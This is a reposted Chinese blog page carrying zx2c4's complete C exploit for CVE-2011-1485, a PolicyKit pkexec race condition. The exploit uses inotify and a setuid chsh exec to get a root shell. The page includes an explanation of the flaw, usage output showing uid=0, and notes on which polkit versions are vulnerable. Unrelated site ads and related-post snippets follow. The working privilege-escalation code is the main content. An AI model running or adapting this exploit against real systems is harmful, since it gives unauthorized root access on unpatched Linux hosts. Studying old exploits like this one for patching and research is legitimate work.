linux polkitd 漏洞,CVE-2011-1485 Red Hat PolicyKit pkexec功能和polkitd守护进程竞争条件漏洞-漏洞情报、漏洞详情、安全漏洞、CVE – 安全客…「建议收藏」

linux polkitd 漏洞,CVE-2011-1485 Red Hat PolicyKit pkexec功能和polkitd守护进程竞争条件漏洞-漏洞情报、漏洞详情、安全漏洞、CVE – 安全客…「建议收藏」/*polkit-pwnage.c***==============================*=PolicyKitPwnage=*=byzx2c4=*=Sept2,2011=*==============================***Howdyfolks,**T…

大家好,又见面了,我是你们的朋友全栈君。

/* polkit-pwnage.c

*

*

* ==============================

* = PolicyKit Pwnage =

* = by zx2c4 =

* = Sept 2, 2011 =

* ==============================

*

*

* Howdy folks,

*

* This exploits CVE-2011-1485, a race condition in PolicyKit.

*

* davidz25 explains:

*

* –begin–

* Briefly, the problem is that the UID for the parent process of pkexec(1) is

* read from /proc by stat(2)’ing /proc/PID. The problem with this is that

* this returns the effective uid of the process which can easily be set to 0

* by invoking a setuid-root binary such as /usr/bin/chsh in the parent

* process of pkexec(1). Instead we are really interested in the real-user-id.

* While there’s a check in pkexec.c to avoid this problem (by comparing it to

* what we expect the uid to be – namely that of the pkexec.c process itself which

* is the uid of the parent process at pkexec-spawn-time), there is still a short

* window where an attacker can fool pkexec/polkitd into thinking that the parent

* process has uid 0 and is therefore authorized. It’s pretty hard to hit this

* window – I actually don’t know if it can be made to work in practice.

* –end–

*

* Well, here is, in fact, how it’s made to work in practice. There is as he said an

* attempted mitigation, and the way to trigger that mitigation path is something

* like this:

*

* $ sudo -u `whoami` pkexec sh

* User of caller (0) does not match our uid (1000)

*

* Not what we want. So the trick is to execl to a suid at just the precise moment

* /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed,

* and execl to the suid binary as our very next instruction.

*

* ** Usage **

* $ pkexec –version

* pkexec version 0.101

* $ gcc polkit-pwnage.c -o pwnit

* $ ./pwnit

* [+] Configuring inotify for proper pid.

* [+] Launching pkexec.

* sh-4.2# whoami

* root

* sh-4.2# id

* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

* sh-4.2#

*

* ** Targets **

* This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which

* as of writing uses 0.101, has backported 0.102’s bug fix. A way to check

* this is by looking at the mtime of /usr/bin/pkexec — April 22, 2011 or

* later and you’re out of luck. It’s likely other distributions do the same.

* Fortunately, this exploit is clean enough that you can try it out without

* too much collateral.

*

*

* greets to djrbliss and davidz25.

*

* – zx2c4

* 2-sept-2011

*

*/

#include

#include

#include

#include

#include

#include

int main(int argc, char **argv)

{

printf(“=============================\n”);

printf(“= PolicyKit Pwnage =\n”);

printf(“= by zx2c4 =\n”);

printf(“= Sept 2, 2011 =\n”);

printf(“=============================\n\n”);

if (fork()) {

int fd;

char pid_path[1024];

sprintf(pid_path, “/proc/%i”, getpid());

printf(“[+] Configuring inotify for proper pid.\n”);

close(0); close(1); close(2);

fd = inotify_init();

if (fd < 0)

perror(“[-] inotify_init”);

inotify_add_watch(fd, pid_path, IN_ACCESS);

read(fd, NULL, 0);

execl(“/usr/bin/chsh”, “chsh”, NULL);

} else {

sleep(1);

printf(“[+] Launching pkexec.\n”);

execl(“/usr/bin/pkexec”, “pkexec”, “/bin/sh”, NULL);

}

return 0;

}

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/148178.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • mysql 符串类型的数字排序(字符串转数字)[通俗易懂]

    mysql 符串类型的数字排序(字符串转数字)[通俗易懂]针对字符串类型的字符排序需要先转换成数字再进行排序1.直接用加法  字符串+0select*fromordersorderby(mark+0)desc2.使用函数CAST(valueastype);CONVERT(value,type);注:这里的type可以为:浮点数:DECIMAL整数:SIGNED无符号整数:UNSIGNEDselect*fromordersorderby…

  • linux驱动最新面试题(面试题整理,含答案)

    linux驱动最新面试题(面试题整理,含答案)linux驱动面试题2018(面试题整理,含答案)版权声明:本文为博主原创文章,未经博主允许不得转载。转载请标明原址:https://blog.csdn.net/kai_zone/article/details/82021233前言:这篇文章主要是对linux驱动面试题一个整理跟总结,参考了很多网上的资料,基本涵盖linux驱动相关面试内容。我把他们大概的分为三部…

  • linux超级用户权限 rwx_Linux的RWX权限管理实现详解及chmod使用

    linux超级用户权限 rwx_Linux的RWX权限管理实现详解及chmod使用前文我们对Linux操作系统的权限管理进行了简要的介绍。今天我们就详细介绍一下关于RWX权限管理的更多细节。很多同学对RWX权限都有一些了解,但是要说出子丑来恐怕就不那么容易了。Linux的RWX权限控制又称为DAC(DiscretionaryAccessControl,自主访问控制)。DAC机制就是指对象的拥有者可以任意修改或授予此对象相应的权限。从主体和客体的角度来说,就是主体对其拥有的…

  • 查看端口 并关闭端口

    查看端口 并关闭端口假如在Windows平台下,我们的端口号被谁占用了,以8080端口为例:       在,命令行输入:netstat-nao出现: 协议 本地地址     外部地址    状态     PID TCP  0.0.0.0:135      0.0.0.0:0       LISTENING  

  • 手机丅f丅lcd什么屏_手机丅f丅lcd什么屏_全球首款屏下相机,90Hz OLED屏+4220mAh「建议收藏」

    手机丅f丅lcd什么屏_手机丅f丅lcd什么屏_全球首款屏下相机,90Hz OLED屏+4220mAh「建议收藏」在传统非全面屏手机时,指纹很好实现,放个传感器在屏幕下方区域就行了,但是全面屏时代,很多手机将指纹改为后置或者侧边指纹,不过后置太难看了,侧边指纹体验不是很好,还是屏幕指纹体验最好,OLED非常轻薄,而且具有一定的光通透性,因此可以实现屏幕指纹,指纹是解决了,但是前置摄像头的放置又是一个问题,刘海屏、水滴屏和挖孔屏都不能形成完美的真全面屏。不过功夫不负有心人,任何再难的技术,只要敢想就能实现,敢做…

  • webstorm 2021 激活码_最新在线免费激活

    (webstorm 2021 激活码)JetBrains旗下有多款编译器工具(如:IntelliJ、WebStorm、PyCharm等)在各编程领域几乎都占据了垄断地位。建立在开源IntelliJ平台之上,过去15年以来,JetBrains一直在不断发展和完善这个平台。这个平台可以针对您的开发工作流进行微调并且能够提供…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号